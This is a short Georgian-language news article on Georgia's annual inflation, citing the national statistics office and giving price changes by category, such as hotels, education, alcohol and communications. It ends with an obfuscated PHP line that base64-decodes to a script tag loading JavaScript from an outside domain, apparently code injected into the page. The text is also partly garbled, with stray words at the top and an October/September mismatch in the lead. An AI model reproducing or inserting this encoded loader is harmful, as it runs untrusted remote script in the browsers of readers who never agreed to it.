celsiusi
ავერსი შნაიდერი

ოქტომბერში საქართველოში წლიურმა ინფლაციამ 0.3% შეადგინა, - ამის შესახებ საქსტატის ინფლაციის ანგარიშიდან ირკვევა. დოკუმენტის თანახმად, 2024 წლის სექტემბერში წინა წლის შესაბამის პერიოდთან შედარებით ყველაზე მსხვილ სამომხმარებლო ჯგუფში - სურსათში ფასები წლიურად 0.4%-ით გაიზარდა. ამასთან, სურსათზე უფრო მკვეთრად 3.3%-ით არის გაზრდილი ალკოჰოლური სასმელებისა და თამბაქოს ფასები, ასევე 7.6%-ით არის მომატებული სასტუმროებისა და რესტორნების ფასები, განათლების სექტორში კი ზრდა 5%-ს შეადგენს.

სასტუმროების, კაფეებისა და რესტორნების ჯგუფში ფასები გაიზარდა 7.6 პროცენტით, რაც წლიურ ინდექსზე 0.26 პროცენტული პუნქტით აისახა. ფასები გაზრდილია როგორც ღამის გასათევით მომსახურებაზე (10.4 პროცენტი), ისე საზოგადოებრივ კვებაზე (6.8 პროცენტი);

განათლება: ჯგუფში ფასები გაიზარდა 5.0 პროცენტით, რაც წლიურ ინფლაციაზე 0.25 პროცენტული პუნქტით აისახა. ფასები მომატებულია სკოლამდელ და დაწყებით განათლებაზე (10.0 პროცენტი), საშუალო განათლებაზე (5.8 პროცენტი) და უმაღლეს განათლებაზე (2.8 პროცენტი);

ალკოჰოლური სასმელები, თამბაქო: ჯგუფში ფასები გაიზარდა 3.3 პროცენტით, რაც წლიურ ინფლაციაზე 0.22 პროცენტული პუნქტით აისახა. ფასები გაიზარდა როგორც ალკოჰოლურ სასმელებზე (5.2 პროცენტი), ისე თამბაქოს ნაწარმზე (1.1 პროცენტი);

სხვადასხვა საქონელი და მომსახურება: ჯგუფში ფასები გაიზარდა 5.8 პროცენტით, რაც 0.3 პროცენტული პუნქტით აისახა მთლიან ინდექსზე. ფასები მომატებულია ქვეჯგუფებზე: პირადი ნივთები, სხვა კატეგორიებში ჩაურთველი (24.5 პროცენტი), დაზღვევა (12.9 პროცენტი), საფინანსო მომსახურება (4.5 პროცენტი), პირადი ჰიგიენა (1.8 პროცენტი);

კავშირგაბმულობა: ჯგუფში ფასები შემცირებულია 12.7 პროცენტით, რაც წლიურ ინფლაციაზე -0.47 პროცენტული პუნქტით აისახა.

75
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");